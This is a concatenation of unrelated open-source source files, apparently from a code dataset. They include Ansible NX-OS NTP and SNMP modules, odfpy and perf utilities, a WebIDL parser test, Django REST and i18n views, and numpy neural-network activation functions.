if len(snmp_community_rst["community_info"]) != 0:
cmd = snmp_community_obj.merge_snmp_community(module=module)
changed = True
updates.append(cmd)
else:
cmd = snmp_community_obj.create_snmp_community(module=module)
changed = True
updates.append(cmd)
if snmp_v3_group_rst["need_cfg"]:
if len(snmp_v3_group_rst["group_info"]):
cmd = snmp_community_obj.merge_snmp_v3_group(module=module)
changed = True
updates.append(cmd)
else:
cmd = snmp_community_obj.create_snmp_v3_group(module=module)
changed = True
updates.append(cmd)
else:
if snmp_community_rst["need_cfg"]:
cmd = snmp_community_obj.delete_snmp_community(module=module)
changed = True
updates.append(cmd)
if snmp_v3_group_rst["need_cfg"]:
cmd = snmp_community_obj.delete_snmp_v3_group(module=module)
changed = True
updates.append(cmd)
# state end snmp community config
snmp_community_rst = snmp_community_obj.check_snmp_community_args(
module=module)
end_tmp = dict()
for item in snmp_community_rst:
if item != "need_cfg":
end_tmp[item] = snmp_community_rst[item]
if end_tmp:
end_state["snmp community"] = end_tmp
# state end snmp v3 group config
snmp_v3_group_rst = snmp_community_obj.check_snmp_v3_group_args(
module=module)
end_tmp = dict()
for item in snmp_v3_group_rst:
if item != "need_cfg":
end_tmp[item] = snmp_v3_group_rst[item]
if end_tmp:
end_state["snmp v3 group"] = end_tmp
results = dict()
results['proposed'] = proposed
results['existing'] = existing
results['changed'] = changed
results['end_state'] = end_state
results['updates'] = updates
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
nozuono/calibre-webserver | src/odf/xforms.py | 96 | 1231 | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
from namespaces import XFORMSNS
from element import Element
# ODF 1.0 section 11.2
# XForms is designed to be embedded in another XML format.
# Autogenerated
def Model(**args):
return Element(qname = (XFORMSNS,'model'), **args)
def Instance(**args):
return Element(qname = (XFORMSNS,'instance'), **args)
def Bind(**args):
return Element(qname = (XFORMSNS,'bind'), **args)
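# Illustrative usage sketch (not part of the original module): a hedged,
# minimal example of nesting the XForms wrappers above, assuming the shared
# odf Element API exposes addElement() as it does elsewhere in odfpy. The
# elements are built without attributes to keep the sketch independent of
# grammar checking.
if __name__ == '__main__':
    model = Model()
    model.addElement(Instance())
    model.addElement(Bind())
    print(model.tagName)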
| gpl-3.0 |
srsdanitest/stockacercloudmobilekernel | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py | 12527 | 1935 | # Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <[email protected]>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
NSECS_PER_SEC = 1000000000
def avg(total, n):
return total / n
def nsecs(secs, nsecs):
return secs * NSECS_PER_SEC + nsecs
def nsecs_secs(nsecs):
return nsecs / NSECS_PER_SEC
def nsecs_nsecs(nsecs):
return nsecs % NSECS_PER_SEC
def nsecs_str(nsecs):
str = "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs)),
return str
def add_stats(dict, key, value):
if not dict.has_key(key):
dict[key] = (value, value, value, 1)
else:
min, max, avg, count = dict[key]
if value < min:
min = value
if value > max:
max = value
avg = (avg + value) / 2
dict[key] = (min, max, avg, count + 1)
def clear_term():
print("\x1b[H\x1b[2J")
audit_package_warned = False
try:
import audit
machine_to_id = {
'x86_64': audit.MACH_86_64,
'alpha' : audit.MACH_ALPHA,
'ia64' : audit.MACH_IA64,
'ppc' : audit.MACH_PPC,
'ppc64' : audit.MACH_PPC64,
's390' : audit.MACH_S390,
's390x' : audit.MACH_S390X,
'i386' : audit.MACH_X86,
'i586' : audit.MACH_X86,
'i686' : audit.MACH_X86,
}
try:
machine_to_id['armeb'] = audit.MACH_ARMEB
except:
pass
machine_id = machine_to_id[os.uname()[4]]
except:
if not audit_package_warned:
audit_package_warned = True
print "Install the audit-libs-python package to get syscall names"
def syscall_name(id):
try:
return audit.audit_syscall_to_name(id, machine_id)
except:
return str(id)
def strerror(nr):
try:
return errno.errorcode[abs(nr)]
except:
return "Unknown %d errno" % nr
| gpl-2.0 |
g-k/servo | components/script/dom/bindings/codegen/parser/tests/test_typedef.py | 106 | 1874 | def WebIDLTest(parser, harness):
parser.parse("""
typedef long mylong;
typedef long? mynullablelong;
interface Foo {
const mylong X = 5;
const mynullablelong Y = 7;
const mynullablelong Z = null;
void foo(mylong arg);
};
""")
results = parser.finish()
harness.check(results[2].members[1].type.name, "Long",
"Should expand typedefs")
parser = parser.reset()
threw = False
try:
parser.parse("""
typedef long? mynullablelong;
interface Foo {
void foo(mynullablelong? Y);
};
""")
results = parser.finish()
except:
threw = True
harness.ok(threw, "Should have thrown on nullable inside nullable arg.")
parser = parser.reset()
threw = False
try:
parser.parse("""
typedef long? mynullablelong;
interface Foo {
const mynullablelong? X = 5;
};
""")
results = parser.finish()
except:
threw = True
harness.ok(threw, "Should have thrown on nullable inside nullable const.")
parser = parser.reset()
threw = False
try:
parser.parse("""
interface Foo {
const mynullablelong? X = 5;
};
typedef long? mynullablelong;
""")
results = parser.finish()
except:
threw = True
harness.ok(threw,
"Should have thrown on nullable inside nullable const typedef "
"after interface.")
parser = parser.reset()
parser.parse("""
interface Foo {
const mylong X = 5;
};
typedef long mylong;
""")
results = parser.finish()
harness.check(results[0].members[0].type.name, "Long",
"Should expand typedefs that come before interface")
| mpl-2.0 |
PriceChild/ansible | lib/ansible/modules/network/nxos/nxos_ntp.py | 19 | 13134 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: nxos_ntp
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages core NTP configuration.
description:
- Manages core NTP configuration.
author:
- Jason Edelman (@jedelman8)
options:
server:
description:
- Network address of NTP server.
required: false
default: null
peer:
description:
- Network address of NTP peer.
required: false
default: null
key_id:
description:
- Authentication key identifier to use with
given NTP server or peer.
required: false
default: null
prefer:
description:
- Makes given NTP server or peer the preferred
NTP server or peer for the device.
required: false
default: null
choices: ['enabled', 'disabled']
vrf_name:
description:
- Makes the device communicate with the given
NTP server or peer over a specific VRF.
required: false
default: null
source_addr:
description:
- Local source address from which NTP messages are sent.
required: false
default: null
source_int:
description:
- Local source interface from which NTP messages are sent.
Must be fully qualified interface name.
required: false
default: null
state:
description:
- Manage the state of the resource.
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# Set NTP Server with parameters
- nxos_ntp:
server: 1.2.3.4
key_id: 32
prefer: enabled
host: "{{ inventory_hostname }}"
username: "{{ un }}"
password: "{{ pwd }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"address": "2.2.2.2", "key_id": "48",
"peer_type": "server", "prefer": "enabled",
"source": "3.3.3.3", "source_type": "source"}
existing:
description:
- k/v pairs of existing ntp server/peer
type: dict
sample: {"address": "2.2.2.2", "key_id": "32",
"peer_type": "server", "prefer": "enabled",
"source": "ethernet2/1", "source_type": "source-interface"}
end_state:
description: k/v pairs of ntp info after module execution
returned: always
type: dict
sample: {"address": "2.2.2.2", "key_id": "48",
"peer_type": "server", "prefer": "enabled",
"source": "3.3.3.3", "source_type": "source"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["ntp server 2.2.2.2 prefer key 48",
"no ntp source-interface ethernet2/1", "ntp source 3.3.3.3"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
from ansible.module_utils.nxos import get_config, load_config, run_commands
from ansible.module_utils.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.netcfg import CustomNetworkConfig
import re
def execute_show_command(command, module, command_type='cli_show'):
if module.params['transport'] == 'cli':
if 'show run' not in command:
command += ' | json'
cmds = [command]
body = run_commands(module, cmds)
elif module.params['transport'] == 'nxapi':
cmds = [command]
body = run_commands(module, cmds)
return body
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
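# Read "ntp source"/"ntp source-interface" from the running config and return
# the configured source type and value (lower-cased), or (None, None) when no
# source is configured.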
def get_ntp_source(module):
source_type = None
source = None
command = 'show run | inc ntp.source'
output = execute_show_command(command, module, command_type='cli_show_ascii')
if output:
try:
if 'interface' in output[0]:
source_type = 'source-interface'
else:
source_type = 'source'
source = output[0].split()[2].lower()
except AttributeError:
source_type = None
source = None
return source_type, source
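# Parse the configured NTP servers/peers from the running config. The regex
# below captures, for each "ntp server ..." or "ntp peer ..." line, the
# address, an optional "prefer" flag, an optional "use-vrf <name>" and an
# optional "key <id>".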
def get_ntp_peer(module):
command = 'show run | inc ntp.(server|peer)'
ntp_peer_list = []
ntp = execute_show_command(
command, module, command_type='cli_show_ascii')
if ntp:
ntp = ntp[0]
ntp_regex = (
".*ntp\s(server\s(?P<address>\S+)|peer\s(?P<peer_address>\S+))"
"\s*((?P<prefer>prefer)\s*)?(use-vrf\s(?P<vrf_name>\S+)\s*)?"
"(key\s(?P<key_id>\d+))?.*"
)
split_ntp = ntp.splitlines()
for peer_line in split_ntp:
ntp_peer = {}
try:
peer_address = None
vrf_name = None
prefer = None
key_id = None
match_ntp = re.match(ntp_regex, peer_line, re.DOTALL)
group_ntp = match_ntp.groupdict()
address = group_ntp["address"]
peer_address = group_ntp['peer_address']
prefer = group_ntp['prefer']
vrf_name = group_ntp['vrf_name']
key_id = group_ntp['key_id']
if prefer is not None:
prefer = 'enabled'
else:
prefer = 'disabled'
if address is not None:
peer_type = 'server'
elif peer_address is not None:
peer_type = 'peer'
address = peer_address
args = dict(peer_type=peer_type, address=address, prefer=prefer,
vrf_name=vrf_name, key_id=key_id)
ntp_peer = dict((k, v) for k, v in args.items())
ntp_peer_list.append(ntp_peer)
except AttributeError:
ntp_peer_list = []
return ntp_peer_list
def get_ntp_existing(address, peer_type, module):
peer_dict = {}
peer_server_list = []
peer_list = get_ntp_peer(module)
for peer in peer_list:
if peer['address'] == address:
peer_dict.update(peer)
else:
peer_server_list.append(peer)
source_type, source = get_ntp_source(module)
if (source_type is not None and source is not None):
peer_dict['source_type'] = source_type
peer_dict['source'] = source
return (peer_dict, peer_server_list)
def set_ntp_server_peer(peer_type, address, prefer, key_id, vrf_name):
command_strings = []
if prefer:
command_strings.append(' prefer')
if key_id:
command_strings.append(' key {0}'.format(key_id))
if vrf_name:
command_strings.append(' use-vrf {0}'.format(vrf_name))
command_strings.insert(0, 'ntp {0} {1}'.format(peer_type, address))
command = ''.join(command_strings)
return command
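# Build the commands that move the device from the "existing" state to the
# proposed one: an "ntp server|peer ..." line when a server/peer is involved,
# and, when a source is given, the new "ntp source ..." or
# "ntp source-interface ..." line (preceded by removal of the old line if the
# source type changed).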
def config_ntp(delta, existing):
address = delta.get('address', existing.get('address'))
peer_type = delta.get('peer_type', existing.get('peer_type'))
vrf_name = delta.get('vrf_name', existing.get('vrf_name'))
key_id = delta.get('key_id', existing.get('key_id'))
prefer = delta.get('prefer', existing.get('prefer'))
source_type = delta.get('source_type')
source = delta.get('source')
if prefer:
if prefer == 'enabled':
prefer = True
elif prefer == 'disabled':
prefer = False
if source:
source_type = delta.get('source_type', existing.get('source_type'))
ntp_cmds = []
if peer_type:
ntp_cmds.append(set_ntp_server_peer(
peer_type, address, prefer, key_id, vrf_name))
if source:
existing_source_type = existing.get('source_type')
existing_source = existing.get('source')
if existing_source_type and source_type != existing_source_type:
ntp_cmds.append('no ntp {0} {1}'.format(existing_source_type, existing_source))
ntp_cmds.append('ntp {0} {1}'.format(source_type, source))
return ntp_cmds
def main():
argument_spec = dict(
server=dict(type='str'),
peer=dict(type='str'),
key_id=dict(type='str'),
prefer=dict(type='str', choices=['enabled', 'disabled']),
vrf_name=dict(type='str'),
source_addr=dict(type='str'),
source_int=dict(type='str'),
state=dict(choices=['absent', 'present'], default='present'),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=[
['server','peer'],
['source_addr','source_int']],
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
server = module.params['server'] or None
peer = module.params['peer'] or None
key_id = module.params['key_id']
prefer = module.params['prefer']
vrf_name = module.params['vrf_name']
source_addr = module.params['source_addr']
source_int = module.params['source_int']
state = module.params['state']
if source_int is not None:
source_int = source_int.lower()
if server:
peer_type = 'server'
address = server
elif peer:
peer_type = 'peer'
address = peer
else:
peer_type = None
address = None
source_type = None
source = None
if source_addr:
source_type = 'source'
source = source_addr
elif source_int:
source_type = 'source-interface'
source = source_int
if key_id or vrf_name or prefer:
if not server and not peer:
module.fail_json(
msg='Please supply the server or peer parameter')
args = dict(peer_type=peer_type, address=address, key_id=key_id,
prefer=prefer, vrf_name=vrf_name, source_type=source_type,
source=source)
proposed = dict((k, v) for k, v in args.items() if v is not None)
existing, peer_server_list = get_ntp_existing(address, peer_type, module)
end_state = existing
changed = False
commands = []
if state == 'present':
delta = dict(set(proposed.items()).difference(existing.items()))
if delta:
command = config_ntp(delta, existing)
if command:
commands.append(command)
elif state == 'absent':
if existing.get('peer_type') and existing.get('address'):
command = 'no ntp {0} {1}'.format(
existing['peer_type'], existing['address'])
if command:
commands.append([command])
existing_source_type = existing.get('source_type')
existing_source = existing.get('source')
proposed_source_type = proposed.get('source_type')
proposed_source = proposed.get('source')
if proposed_source_type:
if proposed_source_type == existing_source_type:
if proposed_source == existing_source:
command = 'no ntp {0} {1}'.format(
existing_source_type, existing_source)
if command:
commands.append([command])
cmds = flatten_list(commands)
if cmds:
if module.check_mode:
module.exit_json(changed=True, commands=cmds)
else:
changed = True
load_config(module, cmds)
end_state = get_ntp_existing(address, peer_type, module)[0]
if 'configure' in cmds:
cmds.pop(0)
results = {}
results['proposed'] = proposed
results['existing'] = existing
results['updates'] = cmds
results['changed'] = changed
results['warnings'] = warnings
results['end_state'] = end_state
results['peer_server_list'] = peer_server_list
module.exit_json(**results)
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
weijia/djangoautoconf | djangoautoconf/django_rest_framework_utils/serializer_generator.py | 1 | 6042 | from django.conf.urls import url, include
from rest_framework import serializers
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
from rest_framework.serializers import ModelSerializer
from rest_framework.urlpatterns import format_suffix_patterns
from djangoautoconf.model_utils.model_reversion import add_reversion_before_save
from ufs_tools.string_tools import class_name_to_low_case
from djangoautoconf.model_utils.model_attr_utils import model_enumerator, enum_model_fields
g_exclude_field_list = []
try:
from geoposition.fields import GeopositionField
g_exclude_field_list.append(GeopositionField)
except:
pass
class ModelSerializerWithUser(ModelSerializer):
def save(self, **kwargs):
user = None
if "request" in self.context and self.context['request']:
user = self.context['request'].user
return super(ModelSerializerWithUser, self).save(user=user, **kwargs)
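# Dynamically build a ModelSerializer subclass for the given model: an inner
# "Meta" class is generated with type(), and a read-only "last_modifier"
# field defaulting to the current user is added when the model defines such
# an attribute.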
def get_serializer(class_inst, serializer_parent=[ModelSerializer]):
meta_class = type("Meta", tuple(), {"model": class_inst,
"fields": '__all__', # Required by new restframework
}
)
serializer_attr_dict = {"Meta": meta_class}
if hasattr(class_inst, "last_modifier"):
serializer_attr_dict['last_modifier'] = serializers.PrimaryKeyRelatedField(
read_only=True, default=serializers.CurrentUserDefault())
return type(class_inst.__name__ + "Serializer", tuple(serializer_parent),
serializer_attr_dict
)
def get_api_class(class_inst, suffix="List", parent=[ListCreateAPIView]):
serializer = get_serializer(class_inst)
api_class_name = class_inst.__name__ + suffix
return get_api_class_from_serializer(class_inst, parent, serializer, api_class_name)
class ApiClassGenerator(object):
def __init__(self, api_class_parent=[ListCreateAPIView], serializer_parent=[ModelSerializer]):
super(ApiClassGenerator, self).__init__()
self.api_class_parent = api_class_parent
self.serializer_parent = serializer_parent
self.suffix = "List"
def get_api_class(self, class_inst):
serializer = get_serializer(class_inst, self.serializer_parent)
api_class_name = class_inst.__name__ + self.suffix
res_class = get_api_class_from_serializer(class_inst, self.api_class_parent, serializer, api_class_name)
return res_class
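# Assemble a DRF generic view class for the model. Field types listed in
# g_exclude_field_list (e.g. GeopositionField) cannot be used for filtering,
# so they are skipped when building "filter_fields".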
def get_api_class_from_serializer(class_inst, parent, serializer, api_class_name):
filter_fields = []
for field in enum_model_fields(class_inst):
is_need_exclude = False
for exclude_field in g_exclude_field_list:
if type(field) is exclude_field:
is_need_exclude = True
break
        if not is_need_exclude:
            filter_fields.append(field.name)
return type(
api_class_name,
tuple(parent),
{
"queryset": class_inst.objects.all(),
"serializer_class": serializer,
"filter_fields": filter_fields,
# "permission_classes": (permissions.IsAuthenticatedOrReadOnly, ),
}
)
def get_create_api_class(class_inst):
return get_api_class(class_inst)
def get_detail_api_class(class_inst):
"""
Example: url(r'^checklist_list/(?P<pk>[0-9]+)/$', get_detail_api_class(ChecklistTreeItem).as_view()),
:param class_inst:
:return:
"""
return get_api_class(class_inst, "Detail", [RetrieveUpdateDestroyAPIView])
class ModelProcessorBase(object):
excluded_model_names = ('MPTTModel',)
def __init__(self, url_patterns=None):
self.url_list = []
self.url_patterns = url_patterns
def get_patterns(self, models):
for model in model_enumerator(models, self.excluded_model_names):
add_reversion_before_save(model)
if hasattr(model, "objects"):
self.append_urls(model)
return self.url_list
def append_urls(self, model):
self.url_list.append(self.get_url(model))
def get_url(self, model):
pass
class SerializerUrlGenerator(ModelProcessorBase):
def append_urls(self, model):
self.url_list.append(url(r'^rest_api/%s/$' % class_name_to_low_case(model.__name__),
get_create_api_class(model).as_view()))
self.url_list.append(url(r'^rest_api/%s/(?P<pk>[0-9]+)/$' % class_name_to_low_case(model.__name__),
get_detail_api_class(model).as_view()))
def add_rest_api_urls(self, models):
if self.url_patterns is None:
            raise ValueError("No url_patterns found")
self.url_patterns += self.get_patterns(models)
self.url_patterns += url(r'^api-auth/', include('rest_framework.urls',
namespace='rest_framework')),
return format_suffix_patterns(self.url_patterns)
# class FeatureApplier(object):
# default_feature_class_list = ()
#
# def __init__(self, feature_class_list=None):
# super(FeatureApplier, self).__init__()
# self.features = []
#
# if feature_class_list is None:
# feature_class_list = self.default_feature_class_list
#
# for feature in feature_class_list:
# self.add_feature(feature())
#
# def add_feature(self, feature):
# self.features.append(feature)
#
#
# class UrlPatternGenerator(FeatureApplier):
# def __init__(self, url_patterns=None, feature_class_list=None):
# super(UrlPatternGenerator, self).__init__(feature_class_list)
# self.url_patterns = url_patterns
#
# def add_urls_for(self, models):
# for feature in self.features:
# for model in model_enumerator(models, feature.excluded_model_names):
# self.append_urls(model)
# p = patterns('', *self.url_list)
# return p
#
# return self.url_patterns
| bsd-3-clause |
nobukatsu/deep-learning-from-scratch | common/functions.py | 6 | 1179 | # coding: utf-8
import numpy as np
def identity_function(x):
return x
def step_function(x):
return np.array(x > 0, dtype=np.int)
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def sigmoid_grad(x):
return (1.0 - sigmoid(x)) * sigmoid(x)
def relu(x):
return np.maximum(0, x)
def relu_grad(x):
    grad = np.zeros_like(x)
grad[x>=0] = 1
return grad
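# softmax accepts either a single sample (1-D) or a batch (2-D, one sample
# per row); in the batch case the input is transposed so the max/sum
# reductions run per sample, then transposed back.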
def softmax(x):
if x.ndim == 2:
x = x.T
x = x - np.max(x, axis=0)
y = np.exp(x) / np.sum(np.exp(x), axis=0)
return y.T
    x = x - np.max(x)  # subtract the max for numerical stability (overflow countermeasure)
return np.exp(x) / np.sum(np.exp(x))
def mean_squared_error(y, t):
return 0.5 * np.sum((y-t)**2)
def cross_entropy_error(y, t):
if y.ndim == 1:
t = t.reshape(1, t.size)
y = y.reshape(1, y.size)
    # If the training labels are one-hot vectors, convert them to class-index form
if t.size == y.size:
t = t.argmax(axis=1)
batch_size = y.shape[0]
return -np.sum(np.log(y[np.arange(batch_size), t])) / batch_size
def softmax_loss(X, t):
y = softmax(X)
return cross_entropy_error(y, t)
| mit |
h4r5h1t/django-hauthy | django/views/i18n.py | 82 | 11043 | import gettext as gettext_module
import importlib
import json
import os
from django import http
from django.apps import apps
from django.conf import settings
from django.template import Context, Engine
from django.utils import six
from django.utils._os import upath
from django.utils.encoding import smart_text
from django.utils.formats import get_format, get_format_modules
from django.utils.http import is_safe_url
from django.utils.translation import (
LANGUAGE_SESSION_KEY, check_for_language, get_language, to_locale,
)
def set_language(request):
"""
Redirect to a given url while setting the chosen language in the
session or cookie. The url and the language code need to be
specified in the request parameters.
Since this view changes how the user will see the rest of the site, it must
only be accessed as a POST request. If called as a GET request, it will
redirect to the page in the request (the 'next' parameter) without changing
any state.
"""
next = request.POST.get('next', request.GET.get('next'))
if not is_safe_url(url=next, host=request.get_host()):
next = request.META.get('HTTP_REFERER')
if not is_safe_url(url=next, host=request.get_host()):
next = '/'
response = http.HttpResponseRedirect(next)
if request.method == 'POST':
lang_code = request.POST.get('language', None)
if lang_code and check_for_language(lang_code):
if hasattr(request, 'session'):
request.session[LANGUAGE_SESSION_KEY] = lang_code
else:
response.set_cookie(settings.LANGUAGE_COOKIE_NAME, lang_code,
max_age=settings.LANGUAGE_COOKIE_AGE,
path=settings.LANGUAGE_COOKIE_PATH,
domain=settings.LANGUAGE_COOKIE_DOMAIN)
return response
def get_formats():
"""
    Returns all format strings required for i18n to work
"""
FORMAT_SETTINGS = (
'DATE_FORMAT', 'DATETIME_FORMAT', 'TIME_FORMAT',
'YEAR_MONTH_FORMAT', 'MONTH_DAY_FORMAT', 'SHORT_DATE_FORMAT',
'SHORT_DATETIME_FORMAT', 'FIRST_DAY_OF_WEEK', 'DECIMAL_SEPARATOR',
'THOUSAND_SEPARATOR', 'NUMBER_GROUPING',
'DATE_INPUT_FORMATS', 'TIME_INPUT_FORMATS', 'DATETIME_INPUT_FORMATS'
)
result = {}
for module in [settings] + get_format_modules(reverse=True):
for attr in FORMAT_SETTINGS:
result[attr] = get_format(attr)
formats = {}
for k, v in result.items():
if isinstance(v, (six.string_types, int)):
formats[k] = smart_text(v)
elif isinstance(v, (tuple, list)):
formats[k] = [smart_text(value) for value in v]
return formats
js_catalog_template = r"""
{% autoescape off %}
(function (globals) {
var django = globals.django || (globals.django = {});
{% if plural %}
django.pluralidx = function (n) {
var v={{ plural }};
if (typeof(v) == 'boolean') {
return v ? 1 : 0;
} else {
return v;
}
};
{% else %}
django.pluralidx = function (count) { return (count == 1) ? 0 : 1; };
{% endif %}
{% if catalog_str %}
/* gettext library */
django.catalog = {{ catalog_str }};
django.gettext = function (msgid) {
var value = django.catalog[msgid];
if (typeof(value) == 'undefined') {
return msgid;
} else {
return (typeof(value) == 'string') ? value : value[0];
}
};
django.ngettext = function (singular, plural, count) {
var value = django.catalog[singular];
if (typeof(value) == 'undefined') {
return (count == 1) ? singular : plural;
} else {
return value[django.pluralidx(count)];
}
};
django.gettext_noop = function (msgid) { return msgid; };
django.pgettext = function (context, msgid) {
var value = django.gettext(context + '\x04' + msgid);
if (value.indexOf('\x04') != -1) {
value = msgid;
}
return value;
};
django.npgettext = function (context, singular, plural, count) {
var value = django.ngettext(context + '\x04' + singular, context + '\x04' + plural, count);
if (value.indexOf('\x04') != -1) {
value = django.ngettext(singular, plural, count);
}
return value;
};
{% else %}
/* gettext identity library */
django.gettext = function (msgid) { return msgid; };
django.ngettext = function (singular, plural, count) { return (count == 1) ? singular : plural; };
django.gettext_noop = function (msgid) { return msgid; };
django.pgettext = function (context, msgid) { return msgid; };
django.npgettext = function (context, singular, plural, count) { return (count == 1) ? singular : plural; };
{% endif %}
django.interpolate = function (fmt, obj, named) {
if (named) {
return fmt.replace(/%\(\w+\)s/g, function(match){return String(obj[match.slice(2,-2)])});
} else {
return fmt.replace(/%s/g, function(match){return String(obj.shift())});
}
};
/* formatting library */
django.formats = {{ formats_str }};
django.get_format = function (format_type) {
var value = django.formats[format_type];
if (typeof(value) == 'undefined') {
return format_type;
} else {
return value;
}
};
/* add to global namespace */
globals.pluralidx = django.pluralidx;
globals.gettext = django.gettext;
globals.ngettext = django.ngettext;
globals.gettext_noop = django.gettext_noop;
globals.pgettext = django.pgettext;
globals.npgettext = django.npgettext;
globals.interpolate = django.interpolate;
globals.get_format = django.get_format;
}(this));
{% endautoescape %}
"""
def render_javascript_catalog(catalog=None, plural=None):
template = Engine().from_string(js_catalog_template)
indent = lambda s: s.replace('\n', '\n ')
context = Context({
'catalog_str': indent(json.dumps(
catalog, sort_keys=True, indent=2)) if catalog else None,
'formats_str': indent(json.dumps(
get_formats(), sort_keys=True, indent=2)),
'plural': plural,
})
return http.HttpResponse(template.render(context), 'text/javascript')
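# Build the merged translation catalog for the requested locale: English
# catalogs are loaded first as defaults, then settings.LANGUAGE_CODE, then
# the selected locale; finally the Plural-Forms expression is extracted from
# the catalog metadata.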
def get_javascript_catalog(locale, domain, packages):
default_locale = to_locale(settings.LANGUAGE_CODE)
app_configs = apps.get_app_configs()
allowable_packages = set(app_config.name for app_config in app_configs)
allowable_packages.add('django.conf')
packages = [p for p in packages if p in allowable_packages]
t = {}
paths = []
en_selected = locale.startswith('en')
en_catalog_missing = True
# paths of requested packages
for package in packages:
p = importlib.import_module(package)
path = os.path.join(os.path.dirname(upath(p.__file__)), 'locale')
paths.append(path)
# add the filesystem paths listed in the LOCALE_PATHS setting
paths.extend(list(reversed(settings.LOCALE_PATHS)))
# first load all english languages files for defaults
for path in paths:
try:
catalog = gettext_module.translation(domain, path, ['en'])
t.update(catalog._catalog)
except IOError:
pass
else:
# 'en' is the selected language and at least one of the packages
# listed in `packages` has an 'en' catalog
if en_selected:
en_catalog_missing = False
# next load the settings.LANGUAGE_CODE translations if it isn't english
if default_locale != 'en':
for path in paths:
try:
catalog = gettext_module.translation(domain, path, [default_locale])
except IOError:
catalog = None
if catalog is not None:
t.update(catalog._catalog)
# last load the currently selected language, if it isn't identical to the default.
if locale != default_locale:
# If the currently selected language is English but it doesn't have a
# translation catalog (presumably due to being the language translated
# from) then a wrong language catalog might have been loaded in the
# previous step. It needs to be discarded.
if en_selected and en_catalog_missing:
t = {}
else:
locale_t = {}
for path in paths:
try:
catalog = gettext_module.translation(domain, path, [locale])
except IOError:
catalog = None
if catalog is not None:
locale_t.update(catalog._catalog)
if locale_t:
t = locale_t
plural = None
if '' in t:
for l in t[''].split('\n'):
if l.startswith('Plural-Forms:'):
plural = l.split(':', 1)[1].strip()
if plural is not None:
# this should actually be a compiled function of a typical plural-form:
# Plural-Forms: nplurals=3; plural=n%10==1 && n%100!=11 ? 0 :
# n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2;
plural = [el.strip() for el in plural.split(';') if el.strip().startswith('plural=')][0].split('=', 1)[1]
pdict = {}
maxcnts = {}
catalog = {}
for k, v in t.items():
if k == '':
continue
if isinstance(k, six.string_types):
catalog[k] = v
elif isinstance(k, tuple):
msgid = k[0]
cnt = k[1]
maxcnts[msgid] = max(cnt, maxcnts.get(msgid, 0))
pdict.setdefault(msgid, {})[cnt] = v
else:
raise TypeError(k)
for k, v in pdict.items():
        catalog[k] = [v.get(i, '') for i in range(maxcnts[k] + 1)]
return catalog, plural
def null_javascript_catalog(request, domain=None, packages=None):
"""
Returns "identity" versions of the JavaScript i18n functions -- i.e.,
versions that don't actually do anything.
"""
return render_javascript_catalog()
def javascript_catalog(request, domain='djangojs', packages=None):
"""
Returns the selected language catalog as a javascript library.
Receives the list of packages to check for translations in the
packages parameter either from an infodict or as a +-delimited
string from the request. Default is 'django.conf'.
Additionally you can override the gettext domain for this view,
but usually you don't want to do that, as JavaScript messages
go to the djangojs domain. But this might be needed if you
deliver your JavaScript source from Django templates.
"""
locale = to_locale(get_language())
if request.GET and 'language' in request.GET:
if check_for_language(request.GET['language']):
locale = to_locale(request.GET['language'])
if packages is None:
packages = ['django.conf']
if isinstance(packages, six.string_types):
packages = packages.split('+')
catalog, plural = get_javascript_catalog(locale, domain, packages)
return render_javascript_catalog(catalog, plural)
| bsd-3-clause |
josephmfaulkner/stoqs | stoqs/loaders/CANON/loadCANON_october2010.py | 1 | 5132 | #!/usr/bin/env python
__author__ = 'Mike McCann'
__copyright__ = '2011'
__license__ = 'GPL v3'
__contact__ = 'mccann at mbari.org'
__doc__ = '''
Master loader for all CANON activities in October 2010
Mike McCann
MBARI 22 April 2012
@var __date__: Date of last svn commit
@undocumented: __doc__ parser
@status: production
@license: GPL
'''
import os
import sys
parentDir = os.path.join(os.path.dirname(__file__), "../")
